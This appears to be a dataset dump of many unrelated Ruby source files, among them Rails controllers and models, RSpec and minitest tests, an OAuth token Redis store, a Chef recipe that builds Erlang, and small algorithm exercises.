text stringlengths 10 2.61M |
|---|
desc 'check code with brakeman'
task :brakeman do
require 'brakeman'
result = Brakeman.run app_path: '.', print_report: true
exit Brakeman::Warnings_FoundExit_Code unless result.filtered_warnings.empty?
end
|
# @param {Integer} amount
# @param {Integer[]} coins
# @return {Integer}
def change(amount, coins)
return 1 if amount == 0
dp = Array.new(coins.size + 1) { Array.new(amount + 1)}
for i in (0..(coins.size)) do
dp[i][0] = 1
end
for j in (1..amount) do
dp[0][j] = 0
end
p dp
for i in (1..coins.size) do
for j in (1..amount) do
dp[i][j] = 0
dp[i][j] = dp[i][j-coins[i-1]] if j-coins[i-1] >= 0
dp[i][j] += dp[i-1][j]
end
end
dp[i][j]
end
amount = 6
coins = [1, 2, 5]
p change(amount, coins) |
class UnformattedHtml < Exception; end
class DocumentNotFound < Exception; end
class ScraperNotFound < Exception; end
module Myimdb
module HandleExceptions
EXCEPTIONS_ENABLED = true
def self.included(base)
base.send(:include, InstanceMethods)
base.send(:extend, ClassMethods)
end
module InstanceMethods
end
module ClassMethods
def handle_exceptions_for(*method_names)
method_names.each do |method_name|
alias_method("_#{method_name}", method_name)
define_method(method_name) do
begin
send("_#{method_name}")
rescue
if EXCEPTIONS_ENABLED
raise UnformattedHtml.new("Unable to find tag: #{method_name}, probably you are parsing the wrong page.")
else
nil
end
end
end
end
end
end
end
module Scraper
class Base
include HandleExceptions
include Myimdb::Scraper::StringExtensions
def name; end
def directors; end
def directors_with_url; end
def writers; end
def writers_with_url; end
def rating; end
def votes; end
def genres; end
def tagline; end
def plot; end
def year; end
def release_date; end
def image; end
def summary
[:directors, :writers, :rating, :votes, :genres, :tagline, :plot, :year, :release_date].collect do |meth|
data = send(meth)
data = data.join(", ") if Array === data
sprintf("%-15s : %s", meth.to_s.capitalize, data)
end.join("\n")
end
def to_hash
movie_as_hash = {}
[:directors, :writers, :rating, :votes, :genres, :tagline, :plot, :year, :release_date].each do |meth|
movie_as_hash[meth] = send(meth)
end
movie_as_hash
end
def self.all
['Freebase', 'Metacritic', 'RottenTomatoes', 'Imdb']
end
end
end
end |
describe 'Extraction au format :html' do
# Méthode principale pour construire le div qui contient
# un label et une valeur
def div_libval label, valeur
"<div class=\"libval\"><span class=\"label\">#{label}</span><span class=\"value\">#{valeur}</span></div>"
end
before(:all) do
@collecte = Collecte.new(folder_test_2)
@collecte.parse
end
let(:collecte) { @collecte }
let(:film) { @film ||= collecte.film }
let(:code) { @code }
describe 'de toutes les données' do
before(:all) do
File.unlink(@collecte.extractor(:html).final_file.path) if File.exist?(@collecte.extractor(:html).final_file.path)
expect(File.exist? @collecte.extractor(:html).final_file.path).to eq false
@collecte.extract(format: :html, open_file: false)
col = Collecte.new(folder_test_2)
col.film.load
col.extract(format: :html, open_file: false)
@code = File.read(col.extractor(:html).final_file.path)
end
it 'produit le fichier contenant les données extraites' do
expect(File.exist? collecte.extractor(:html).final_file.path).to eq true
end
describe 'produit un fichier contenant' do
it 'la balise générale du doctype' do
expect(code).to include '<!DOCTYPE'
end
it 'la balise générale <html>' do
expect(code).to include '<html lang="fr">'
expect(code).to include '</html>'
end
it 'la balise <head>' do
expect(code).to include '<head>'
expect(code).to include '</head>'
end
it 'la marque principale du film' do
expect(code).to include 'FILM : Everest2016'
end
describe 'la métadonnée ' do
it 'identifiant du film' do
expect(code).to include div_libval('id', 'Everest2016')
end
it 'titre du film' do
expect(code).to include div_libval('titre', 'Éverest')
end
it 'auteurs de la collecte' do
expect(code).to include div_libval('auteurs', 'Phil et Benoit')
end
it 'date de début de collecte' do
expect(code).to include div_libval('debut', '25/4/2017')
end
it 'date de fin de collecte' do
expect(code).to include div_libval('fin', '30/4/2017')
end
end
# /describe la métadonnée
describe 'les données personnages' do
it 'le titre de la section' do
expect(code).to include '=== PERSONNAGES ==='
end
it 'les données des personnages' do
[
{
id: 'prota', prenom:'Prénom1', nom:'Nom Du Protagoniste',
pseudo:'Le Protagoniste', sexe:'Homme', annee:2000,
fonction:'Protagoniste', description:'Description du protagoniste.'
},
{
id: 'anta', prenom:'Prénom2', nom:'Nom De l\'Antagoniste',
sexe:'Femme',
fonction:'Antagoniste', description:'Description de l\'antagoniste.'
}
].each do |hperso|
expect(code).to match /^<div(.*?)>Personnage #{hperso[:id]}<\/div>$/
hperso.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
end
end
end
# /Personnages
describe 'les données des brins' do
it 'le titre de la section' do
expect(code).to include '=== BRINS ==='
end
[
{
id:1, libelle:'Premier brin',
description:'Description du premier brin.'
},
{
id:2, libelle:'Deuxième brin',
description:'Une description du deuxième brin.'
},
{id:3, libelle:'Troisième brin', description:''},
{id:4, libelle:'Quatrième brin', description:''},
{
id:5, libelle:'Cinquième brin inutilisé par la collecte.',
description:''
}
].each do |hbrin|
it "le brin #{hbrin.inspect} est affiché correctement" do
expect(code).to match /<div(.*?)>Brin #{hbrin[:id]}<\/div>/
hbrin.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
end
end
end
# /Brins
describe 'les données des décors' do
it 'le titre de la section' do
expect(code).to include '=== DÉCORS ==='
end
[
{
id: 1,
decor: 'MAISON DE JOE',
scenes_ids: '[1, 3, 4]',
},
{
id: 2, decor: 'JARDIN PUBLIC',
scenes_ids: '[2, 3]'
}
].each do |hdecor|
it "les données du décors #{hdecor.inspect}" do
expect(code).to match /<div(.*?)>Décor #{hdecor[:id]}<\/div>/
hdecor.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
end
end
end
describe 'les données des scènes' do
it 'le titre de la section' do
expect(code).to include '=== SCENES ==='
end
[
{
id:1, numero:1,
resume: {:raw=>"Résumé de la première scène. b1 (6)", :notes_ids=>'[6]', :brins_ids=>'[1]', :scene_id=>'1'},
horloge:'0:00:30',
effet:'JOUR', decors_ids: '[1]',
brins_ids: '[1]', notes_ids: '[6]'
},
{
id:2, numero:2,
resume:{:raw=>'Résumé de la deuxième scène avec [PERSO#prota]. b2 b1', :brins_ids=>'[2, 1]', :scene_id=>'2'},
horloge: '0:01:40', effet:'NUIT',
decors_ids: '[2]',
brins_ids: '[2, 1]', notes_ids: '[4, 5, 6]',
paragraphes: [
{index:0, raw:'Premier beat de la deuxième scène avec [PERSO#anta].'},
{index:1, raw:'Deuxième beat de la deuxième scène avec [PERSO#prota]. (4)(5)(6)'},
{index:2, raw:'Troisième beat de la deuxième scène.'}
]
},
{
id:3, numero:3,
resume:{:raw=>'Résumé de la troisième. (3) b1 b3', :notes_ids=>'[3]', :brins_ids=>'[1, 3]', :scene_id=>3},
horloge:'0:03:20',
effet:'JOUR',
decors_ids:'[1, 2]',
brins_ids:'[1, 3, 2]', notes_ids:'[3, 1]',
paragraphes: [
{index:0, raw:'Paragraphe 1 de troisième. Avec première note. (1)'},
{index:1, raw:'Paragraphe 2 de troisième. Avec deuxième brin. b2'}
]
}
].each do |hscene|
it "les données de la scène ##{hscene[:id]}" do
expect(code).to match /<div(.*?)>Scene #{hscene[:numero]}<\/div>/
data_resume = hscene.delete(:resume)
data_paragraphes = hscene.delete(:paragraphes)
data_resume.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
hscene.each do |prop,valu|
expect(code).to include div_libval(prop, valu)
end
# Test sur les paragraphes
if data_paragraphes
data_paragraphes.each do |hparag|
expect(code).to match /<div(.*?)>Paragraphe #{hparag[:index]}<\/div>/
expect(code).to include div_libval( 'raw', hparag[:raw] )
end
end
end
end
end
end
end
end
|
require "socket"
module Osc
class Client
def initialize(host, port)
@udp = UDPSocket.new
@udp.connect(host, port)
end
def send(address, messages)
osc_message = Osc::Message.new(address, messages)
@udp.send(osc_message.encode, 0)
end
end
end |
class LikesController < ApplicationController
before_action :find_post
def create
if already_liked?
flash[:notice] = "You can't like more than once"
else
@post.likes.create(user_id: current_user.id)
end
redirect_to posts_path
end
private
def find_post
@post = Post.find(params[:post_id])
end
def already_liked?
Like.where(user_id: current_user.id, post_id:
params[:post_id]).exists?
end
end
|
desc "Upload release notes"
lane :upload_release_notes do
deliver(
app_identifier: "com.example.MyApp",
app_version: get_version_number(target: "MyApp"),
force: true,
skip_binary_upload: true,
skip_screenshots: true,
metadata_path: "fastlane/metadata",
)
end
|
require 'spec_helper'
describe 'Comments SO' do
let(:user) { FactoryGirl.create(:user) }
let(:image) { FactoryGirl.create :user_image, user: user }
let(:parameters) do
{
user_id: user.id,
user_image_id: image.id,
content: 'test'
}
end
describe 'parent valid' do
let!(:comment) { Comments::Create.run(parameters).result }
it { expect(Comment.count).to eq 1 }
it { expect(comment.content).to include 'test' }
describe 'with child' do
let(:new_parameters) { parameters.merge parent_id: comment.id }
let!(:child) { Comments::Create.run(new_parameters).result }
it { expect(Comment.count).to eq 2 }
it { expect(child.parent_id).to eq comment.id }
end
end
describe 'parent invalid' do
before { parameters[:content] = nil }
let!(:comment) { Comments::Create.run(parameters) }
it { expect(Comment.count).to eq 0 }
it { expect(comment.valid?).to be nil }
end
end
|
class ShortenedUrl < ActiveRecord::Base
include SecureRandom
validates :long_url, presence: true, uniqueness: true
validates :short_url, presence: true, uniqueness: true
validates :user_id, presence: true
has_many(
:visitors,
primary_key: :short_url,
foreign_key: :short_url,
class_name: :Visit
)
belongs_to(
:submitter,
primary_key: :id,
foreign_key: :user_id,
class_name: :User
)
def self.random_code
shortened_url = SecureRandom.base64(16)
until !self.exists?(short_url: shortened_url)
shortened_url = SecureRandom.base64(16)
end
shortened_url
end
def self.create_for_user_and_long_url!(user_id, long_url)
self.create!(long_url: long_url, short_url: self.random_code, user_id: user_id)
end
def num_clicks
self.visitors.count
end
def num_uniques
self.visitors.select(:user_id).distinct.count
end
def num_recent_uniques
self.visitors.where(created_at: (10.minutes.ago)..Time.now).select(:user_id).distinct.count
end
end
|
require 'test_helper'
module Radiator
class NetworkBroadcastApiTest < Radiator::Test
def setup
@api = Radiator::NetworkBroadcastApi.new
end
def test_method_missing
assert_raises NoMethodError do
@api.bogus
end
end
def test_all_respond_to
@api.method_names.each do |key|
assert @api.respond_to?(key), "expect rpc respond to #{key}"
end
end
def test_all_methods
unless defined? WebMock
skip 'This test cannot run against testnet. It is only here to help locate newly added actions.'
end
@api.method_names.each do |key|
begin
assert @api.send key
fail 'did not expect method with invalid argument to execute'
rescue WebMock::NetConnectNotAllowedError => _
# success
rescue ArgumentError => _
# success
end
end
end
def test_broadcast_transaction
stub_post_empty
response = @api.broadcast_transaction
assert_equal response.class, Hashie::Mash, response.inspect
end
end
end
|
#ピタゴラスの三つ組(ピタゴラスの定理を満たす自然数)とはa<b<cで
#a² + b² = c²
#を満たす数の組である.
#
#例えば, 3² + 4² = 9 + 16 = 25 = 5²である.
#a + b + c = 1000となるピタゴラスの
#三つ組が一つだけ存在する. このa,b,cの積を計算しなさい.
class PitagorasCalculator
def initialize(side_sum)
@side_sum = side_sum
calc
end
def print_answer
# p "a(#{@a}) + b(#{@b}) + c(#{@c}) = 1000"
# p "#{@a}^2 + #{@b}^2 = #{@c}^2 is #{check_pitagoras?(@a, @b, @c)}"
p @a * @b * @c
end
private
def calc
# TODO
end
def check_pitagoras?(a,b,c)
return a^2 + b^2 == c^2
end
end
calc = PitagorasCalculator.new(1000)
calc.print_answer
|
module ThreeScale
module Backend
module OAuth
class Token
module Storage
include Configurable
# Default token size is 4K - 512 (to allow for some metadata)
MAXIMUM_TOKEN_SIZE = configuration.oauth.max_token_size || 3584
private_constant :MAXIMUM_TOKEN_SIZE
TOKEN_MAX_REDIS_SLICE_SIZE = 500
private_constant :TOKEN_MAX_REDIS_SLICE_SIZE
TOKEN_TTL_DEFAULT = 86400
private_constant :TOKEN_TTL_DEFAULT
TOKEN_TTL_PERMANENT = 0
private_constant :TOKEN_TTL_PERMANENT
Error = Class.new StandardError
InconsistencyError = Class.new Error
class << self
include Backend::Logging
include Backend::StorageHelpers
def create(token, service_id, app_id, user_id, ttl = nil)
raise AccessTokenFormatInvalid if token.nil? || token.empty? ||
!token.is_a?(String) || token.bytesize > MAXIMUM_TOKEN_SIZE
# raises if TTL is invalid
ttl = sanitized_ttl ttl
key = Key.for token, service_id
raise AccessTokenAlreadyExists.new(token) unless storage.get(key).nil?
value = Value.for(app_id, user_id)
token_set = Key::Set.for(service_id, app_id)
store_token token, token_set, key, value, ttl
ensure_stored! token, token_set, key, value
end
# Deletes a token
#
# Returns the associated [app_id, user_id] or nil
#
def delete(token, service_id)
key = Key.for token, service_id
val = storage.get key
if val
val = Value.from val
app_id = val.first
token_set = Key::Set.for(service_id, app_id)
existed, * = remove_a_token token_set, token, key
unless existed
logger.notify(InconsistencyError.new("Found OAuth token " \
"#{token} for service #{service_id} and app #{app_id} as " \
"key but not in set!"))
end
end
val
end
# Get a token's associated [app_id, user_id]
def get_credentials(token, service_id)
ids = Value.from(storage.get(Key.for(token, service_id)))
raise AccessTokenInvalid.new token if ids.first.nil?
ids
end
# This is used to list tokens by service, app and possibly user.
#
# Note: this deletes tokens that have not been found from the set of
# tokens for the given app - those have to be expired tokens.
def all_by_service_and_app(service_id, app_id, user_id = nil)
token_set = Key::Set.for(service_id, app_id)
deltokens = []
tokens_n_values_flat(token_set, service_id)
.select do |(token, _key, value, _ttl)|
app_id, uid = Value.from value
if app_id.nil?
deltokens << token
false
else
!user_id || uid == user_id
end
end
.map do |(token, _key, value, ttl)|
if user_id
Token.new token, service_id, app_id, user_id, ttl
else
Token.from_value token, service_id, value, ttl
end
end
.force.tap do
# delete expired tokens (nil values) from token set
deltokens.each_slice(TOKEN_MAX_REDIS_SLICE_SIZE) do |delgrp|
storage.srem token_set, delgrp
end
end
end
# Remove tokens by app_id and optionally user_id.
#
# If user_id is nil or unspecified, this will remove all app tokens
#
# Triggered by Application deletion.
#
# TODO: we could expose the ability to delete all tokens for a given
# user_id, but we are currently not doing that.
#
def remove_tokens(service_id, app_id, user_id = nil)
filter = lambda do |_t, _k, v, _ttl|
user_id == Value.from(v).last
end if user_id
remove_tokens_by service_id, app_id, &filter
end
private
# Remove all tokens or only those selected by a block
#
# I thought of leaving this one public, but remove_*_tokens removed
# my use cases for the time being.
def remove_tokens_by(service_id, app_id, &blk)
token_set = Key::Set.for(service_id, app_id)
# No block? Just remove everything and smile!
if blk.nil?
remove_whole_token_set(token_set, service_id)
else
remove_token_set_by(token_set, service_id, &blk)
end
end
def remove_token_set_by(token_set, service_id, &blk)
# Get tokens. Filter them. Group them into manageable groups.
# Extract tokens and keys into separate arrays, one for each.
# Remove tokens from token set (they are keys in a set) and token
# keys themselves.
tokens_n_values_flat(token_set, service_id, false)
.select(&blk)
.each_slice(TOKEN_MAX_REDIS_SLICE_SIZE)
.inject([[], []]) do |acc, groups|
groups.each do |token, key, _value|
acc[0] << token
acc[1] << key
end
acc
end
.each_slice(2)
.inject([]) do |acc, (tokens, keys)|
storage.pipelined do
if tokens && !tokens.empty?
storage.srem token_set, tokens
acc.concat tokens
end
storage.del keys if keys && !keys.empty?
end
acc
end
end
def remove_a_token(token_set, token, key)
storage.pipelined do
storage.srem token_set, token
storage.del key
end
end
def remove_whole_token_set(token_set, service_id)
_token_groups, key_groups = tokens_n_keys(token_set, service_id)
storage.pipelined do
storage.del token_set
# remove all tokens for this app
key_groups.each do |keys|
storage.del keys
end
end
end
# TODO: provide a SSCAN interface with lazy enums because SMEMBERS
# is prone to DoSing and timeouts
def tokens_from(token_set)
# It is important that we make this a lazy enumerator. The
# laziness is maintained until some enumerator forces execution or
# the caller calls 'to_a' or 'force', whichever happens first.
storage.smembers(token_set).lazy
end
def tokens_n_keys(token_set, service_id)
token_groups = tokens_from(token_set).each_slice(TOKEN_MAX_REDIS_SLICE_SIZE)
key_groups = token_groups.map do |tokens|
tokens.map do |token|
Key.for token, service_id
end
end
# Note: this is returning two lazy enumerators
[token_groups, key_groups]
end
# Provides grouped data (as sourced from the lazy iterators) which
# matches respectively in each array position, ie. 1st group of data
# contains a group of tokens, keys and values with ttls, and
# position N of the tokens group has key in position N of the keys
# group, and so on.
#
# [[[token group], [key group], [value_with_ttls_group]], ...]
#
def tokens_n_values_groups(token_set, service_id, with_ttls)
token_groups, key_groups = tokens_n_keys(token_set, service_id)
value_ttl_groups = key_groups.map do |keys|
# pipelining will create an array with the results of commands
res = storage.pipelined do
storage.mget(keys)
if with_ttls
keys.map do |key|
storage.ttl key
end
end
end
# [mget array, 0..n ttls] => [mget array, ttls array]
[res.shift, res]
end
token_groups.zip(key_groups, value_ttl_groups)
end
# Zips the data provided by tokens_n_values_groups so that you stop
# looking at indexes in the respective arrays and instead have:
#
# [group 0, ..., group N] where each group is made of:
# [[token 0, key 0, value 0, ttl 0], ..., [token N, key N, value
# N, ttl N]]
#
def tokens_n_values_zipped_groups(token_set, service_id, with_ttls = true)
tokens_n_values_groups(token_set,
service_id,
with_ttls).map do |tokens, keys, (values, ttls)|
tokens.zip keys, values, ttls
end
end
# Flattens the data provided by tokens_n_values_zipped_groups so
# that you have a transparent iterator with all needed data and can
# stop worrying about streaming groups of elements.
#
def tokens_n_values_flat(token_set, service_id, with_ttls = true)
tokens_n_values_zipped_groups(token_set,
service_id,
with_ttls).flat_map do |groups|
groups.map do |token, key, value, ttl|
[token, key, value, ttl]
end
end
end
# Store the specified token in Redis
#
# TTL specified in seconds.
# A TTL of 0 stores a permanent token
def store_token(token, token_set, key, value, ttl)
# build the storage command so that we can pipeline everything cleanly
command = :set
args = [key]
if !permanent_ttl? ttl
command = :setex
args << ttl
end
args << value
# pipelined will return nil if it is embedded into another
# pipeline(which would be an error at this point) or if shutting
# down and a connection error happens. Both things being abnormal
# means we should just raise a storage error.
raise AccessTokenStorageError, token unless storage.pipelined do
storage.send(command, *args)
storage.sadd(token_set, token)
end
end
# Make sure everything ended up there
#
# TODO: review and possibly reimplement trying to leave it
# consistent as much as possible.
#
# Note that we have a sharding proxy and pipelines can't be guaranteed
# to behave like transactions, since we might have one non-working
# shard. Instead of relying on proxy-specific responses, we just check
# that the data we should have in the store is really there.
def ensure_stored!(token, token_set, key, value)
results = storage.pipelined do
storage.get(key)
storage.sismember(token_set, token)
end
results.last && results.first == value ||
raise(AccessTokenStorageError, token)
end
# Validation for the TTL value
#
# 0 is accepted (understood as permanent token)
# Negative values are not accepted
# Integer(ttl) validation is required (if input is nil, default applies)
def sanitized_ttl(ttl)
ttl = begin
Integer(ttl)
rescue TypeError
# ttl is nil
TOKEN_TTL_DEFAULT
rescue
# NaN
-1
end
raise AccessTokenInvalidTTL if ttl < 0
ttl
end
# Check whether a TTL has the magic value for a permanent token
def permanent_ttl?(ttl)
ttl == TOKEN_TTL_PERMANENT
end
end
end
end
end
end
end
|
class Genre < ApplicationRecord
has_many :artists
end
|
class Video < ActiveRecord::Base
acts_as_decorables
has_many :video_users
has_many :users, through: :video_users
def how_many_times_seen_by(user)
VideoUser.where(video_id: id, user_id: user.id).first.try(:views) || 0
end
end
|
require 'rails_helper'
RSpec.describe ConsultantExamInvitationsController, type: :controller do
describe "get #create" do
let(:user) { create(:user, aasm_state: 'not_invited_to_exam') }
let(:consultant) { create :consultant }
let(:superadmin) { create :superadmin }
it "should not let users in" do
sign_in user
post :create, user_id: consultant
expect(response.status).to be(302)
expect(controller).to set_flash[:alert].to(/not allowed/)
end
it "should not let consultants in" do
sign_in consultant
post :create, user_id: user
expect(response.status).to be(302)
expect(controller).to set_flash[:alert].to(/not allowed/)
end
it "should let in superadmins" do
sign_in superadmin
post :create, user_id: user
expect(response.status).to be(302)
expect(controller).to set_flash[:success].to(/Invitation sent/)
end
it "should send the email invite" do
sign_in superadmin
Sidekiq::Testing.inline! do
expect do
post :create, user_id: user
end.to change{ ActionMailer::Base.deliveries.count }
end
end
it "should block invitations to oneself" do
sign_in superadmin
post :create, user_id: superadmin
expect(response.status).to be(302)
expect(controller).to set_flash[:error].to(/can't invite yourself/)
end
it "should show user not found error message" do
sign_in superadmin
post :create, user_id: 999
expect(response.status).to be(302)
expect(controller).to set_flash[:error].to(/User not found/)
end
it "should work for right consultant" do
sign_in superadmin
post :create, user_id: consultant.id
expect(response).to redirect_to admin_user_path(consultant)
expect(user.consultant?).to be_falsy
end
end
end
|
class FieldDefinition
include Mongoid::Document
include Mongoid::Attributes::Dynamic
field :name, type: String
field :label, type: String
field :field_type, type: String
embedded_in :model_definition, inverse_of: :field_definitions
end
|
class Courses < ActiveRecord::Migration[5.2]
def change
create_table :courses do |t|
t.integer :category_id, null: false, :limit => 8, index: true
t.integer :creator_id, null: false, :limit => 8, index: true
t.string :title, index: true, null: false
t.string :description, null: false
t.timestamps
end
add_foreign_key :courses, :users, column: :creator_id
add_foreign_key :courses, :categories
end
end
|
# frozen_string_literal: true
# rubocop:disable Style/Documentation
class ApplicationController < ActionController::API
before_action :check_mime_type
before_action :check_data_type
before_action :check_user_authentication
private
def check_mime_type
return unless %w[POST PUT PATCH].include? request.method
head :not_acceptable if request.content_type != JSON_MIME_TYPE
end
def check_data_type
return unless %w[POST PUT PATCH DELETE].include? request.method
head :conflict if params.dig('data', 'type') != params[:controller]
end
def check_user_authentication
token = request.headers[API_KEY_HEADER]
return if check_guest(token)
@current_user = resolve_current_user(token)
head :forbidden && return if @current_user.nil?
@target_user = resolve_target_user
rescue ActiveRecord::RecordNotFound
head :not_found
end
def resolve_current_user(token)
return if token.blank?
current_user = User.find_by token: token
current_user
end
def check_guest(token)
@is_guest = token == GUEST_API_KEY
@is_guest
end
def check_guest_access
head :forbidden unless @is_guest
end
def check_super_access
head :forbidden unless @current_user&.admin_role? == true
end
# check that targer user is current user or if current user is admin
def resolve_target_user
return if params[:id].nil?
if @current_user[:id].to_i == params[:id].to_i
@current_user
elsif @current_user.admin_role?
User.find(params['id'])
end
end
def check_target_user
head :forbidden if @is_guest || @target_user.nil?
end
def default_meta
{
logged_in: !@current_user.nil?
}
end
def pagination_meta(entity)
{
total_pages: entity.total_pages,
next_page: entity.next_page,
current_page: entity.current_page,
previous_page: entity.previous_page,
total_entries: entity.total_entries
}
end
def render_error(resource, status)
render json: resource,
status: status,
adapter: :json_api,
serializer: ActiveModel::Serializer::ErrorSerializer
end
end
# rubocop:enable Style/Documentation
|
class ApplicationController < ActionController::Base
before_action :configure_permitted_parameters, if: :devise_controller?
before_action :authenticate_user!
protected
def configure_permitted_parameters
devise_parameter_sanitizer.permit(:account_update, keys: [:role, :department, :name])
end
def must_be_same_company
@product = Product.find(params[:id])
if @product.blank?
@product = Product.find(params[:product_id])
end
user_domain = current_user.email.split("@").last
product_owner_domain = @product.user.email.split("@").last
redirect_to products_path, notice: 'Produto inexistente' if user_domain != product_owner_domain
end
end
|
# The MIT License (MIT)
# Copyright (c) 2013 alisdair sullivan <alisdairsullivan@yahoo.ca>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
def whyrun_supported?
true
end
action :create do
prefix = new_resource.prefix || node['erlang']['prefix']
git_url = new_resource.git_url || node['erlang']['otp_git_url']
ref = new_resource.ref || node['erlang']['otp_git_ref']
config_flags = (new_resource.config_flags || node['erlang']['config_flags']).join(" ")
user = new_resource.user
group = new_resource.group
skip_apps = (new_resource.skip_apps || node['erlang']['skip_apps']).join(",")
cache_path = Chef::Config['file_cache_path']
if FileTest.exists? "#{prefix}/bin/erl"
Chef::Log.info "#{prefix}/bin/erl already exists"
else
converge_by("Create #{ref} in #{prefix}") do
p = prereqs(skip_apps)
p.each do |pkg|
package pkg
end
git "erlang otp" do
user user
group group
repository git_url
destination "#{cache_path}/otp"
action :sync
end
bash "install #{ref} to #{prefix}" do
user user
group group
code <<-EOS
cp -r #{cache_path}/otp #{cache_path}/#{ref}
cd #{cache_path}/#{ref}
git checkout #{ref}
./otp_build autoconf
./configure --prefix=#{prefix} #{config_flags}
touch lib/{#{skip_apps}}/SKIP
make && make install
EOS
end
end
end
end
action :delete do
prefix = new_resource.prefix || node['erlang']['prefix']
if !FileTest.exists? "#{prefix}/bin/erl"
Chef::Log.info "#{new_resource} not installed"
else
converge_by("Delete #{ref} from #{prefix}") do
directory "#{prefix}" do
recursive true
action :delete
end
end
end
end
def prereqs(skip)
p = ["m4"]
case node['platform_family']
when 'debian'
p = p + ["libncurses5-dev", "openssl", "libssl-dev"]
when 'rhel'
p = p + ["ncurses-devel", "openssl-devel"]
end
if !(skip.include?("jinterface") && skip.include?("orber") && skip.include?("ic"))
case node['platform_family']
when 'debian'
p = p + ["openjdk-7-jre-headless"]
when 'rhel'
p = p + ["java-1.6.0-openjdk-devel"]
end
end
if !skip.include?("odbc")
p = p + ["unixodbc-dev"]
end
return p
end
|
Pod::Spec.new do |s|
s.name = 'YHPhotoBrowser'
s.version = '1.0.1'
s.summary = '类似于qq,微信,微博的图片浏览器:9宫格的图片,点击任何一张放大至全屏,并可以左右滑动查看所有图片.简易框架,易懂.'
s.homepage = 'https://github.com/RusselYHCui/YHPhotoBrowser'
s.license = 'MIT'
s.author = { 'Russel_yh_Cui' => '960743995@qq.com' }
s.platform = :ios,'8.0'
s.source = {
:git =>'https://github.com/RusselYHCui/YHPhotoBrowser.git',
:tag => s.version.to_s
}
s.requires_arc = true
s.source_files = 'YHPhotoBrowser/*.{h,m}'
s.dependency 'SDWebImage'
s.framework = 'UIKit', 'QuartzCore'
s.xcconfig = {'HEADER_SEARCH_PATHS' =>'(SDKROOT)/usr/include/libxml2'}
end |
require 'test_helper'
class TableTest < ActiveSupport::TestCase
setup do
@restaurant = create(:restaurant)
end
test 'validate name and table capacity' do
table = build(:table, restaurant: @restaurant)
table.name = nil
assert_not table.valid?
assert_equal "can't be blank", table.errors[:name].first
table.name = 'T-23'
assert table.valid?
table.minimum_capacity = 'abc'
assert_not table.valid?
assert_equal 'is not a number', table.errors[:minimum_capacity].first
table.minimum_capacity = -1
assert_not table.valid?
assert_equal 'must be greater than 0', table.errors[:minimum_capacity].first
table.minimum_capacity = 99
assert_not table.valid?
assert_equal 'cannot be less than minimum_capacity', table.errors[:maximum_capacity].first
table.minimum_capacity = 1
assert table.valid?
assert table.save
end
end
|
object @board_pic
attributes :id, :class_date, :created_at
child :image => :image do
attributes :url, :size, :content_type
node :thumbnail_url do |img|
img.url(:thumb)
end
end
child :author => :author do
attributes :id, :name
end |
class Floor
attr_reader :dirty
def initialize
@dirty = true
end
def dirty?
if dirty == false
puts "The floor should be clean."
else
puts "The floor should be dirty."
end
dirty
end
def wash
@dirty = false
end
end
|
class SubjectsPublication < ActiveRecord::Base
belongs_to :publication
belongs_to :subject
# attr_accessible :publication_id, :subject_id
validates_uniqueness_of :publication_id, :scope => :subject_id
end
|
require "spec_helper"
describe PowerAPI::Data::Student do
include Savon::SpecHelper
before(:all) {
savon.mock!
@session = {:locale=>nil, :server_current_time=>"2014-08-24T03:01:25.007Z", :server_info=>{:api_version=>"2.1.1", :day_light_savings=>"0", :parent_saml_end_point=>nil, :raw_offset=>"-14400000", :server_time=>"2014-08-24T20:19:32.640Z", :student_saml_end_point=>nil, :teacher_saml_end_point=>nil, :time_zone_name=>"BOT", :"@xsi:type"=>"ax287:ServerInfo"}, :service_ticket=>"AAABSAX2Ex5NZXRA4/w06RyTFVkPGkFNEiI3qRAS5pMC7TQkWqT2UQYfVv0/c0SaE70JFJa17maweiMcP1u0skwbYAVPoyNvduejg61AdiePjqJPyhJyJGyGHi3UmuWI", :student_i_ds=>"1", :user_id=>"1", :user_type=>"2", :"@xsi:type"=>"ax284:UserSessionVO"}
}
after(:all) {
savon.unmock!
}
describe "#initialize" do
before(:each) {
@student = PowerAPI::Data::Student.new("http://powerschool.example", @session, false)
}
after(:each) {
@student = nil
}
it "returns nil for sections" do
expect(
@student.sections
).to be_nil
end
it "returns nil for information" do
expect(
@student.information
).to be_nil
end
end
describe "#fetch_transcript" do
it "returns something that looks like a transcript" do
fixture = File.read("spec/fixtures/transcript.json")
message = {
userSessionVO: {
userId: "1",
serviceTicket: "AAABSAX2Ex5NZXRA4/w06RyTFVkPGkFNEiI3qRAS5pMC7TQkWqT2UQYfVv0/c0SaE70JFJa17maweiMcP1u0skwbYAVPoyNvduejg61AdiePjqJPyhJyJGyGHi3UmuWI",
serverInfo: {
apiVersion: "2.1.1"
},
serverCurrentTime: "2012-12-26T21:47:23.792Z",
userType: "2"
},
studentIDs: "1",
qil: {
includes: "1"
}
}
savon.expects(:get_student_data).with(message: message).returns(fixture)
student = PowerAPI::Data::Student.new("http://powerschool.example", @session, false)
transcript = student.fetch_transcript["return"]["studentDataVOs"]
expect(transcript).to include(
"assignmentCategories", "assignments", "assignmentScores",
"finalGrades", "reportingTerms", "schools",
"sections", "student", "teachers"
)
end
end
describe "#parse_transcript" do
before(:each) {
fixture = File.read("spec/fixtures/transcript.json")
fixture = JSON.parse(fixture)
@student = PowerAPI::Data::Student.new("http://powerschool.example", @session, false)
@student.parse_transcript(fixture)
}
after(:each) {
@student = nil
}
it "has two sections" do
expect(
@student.sections.length
).to be(2)
end
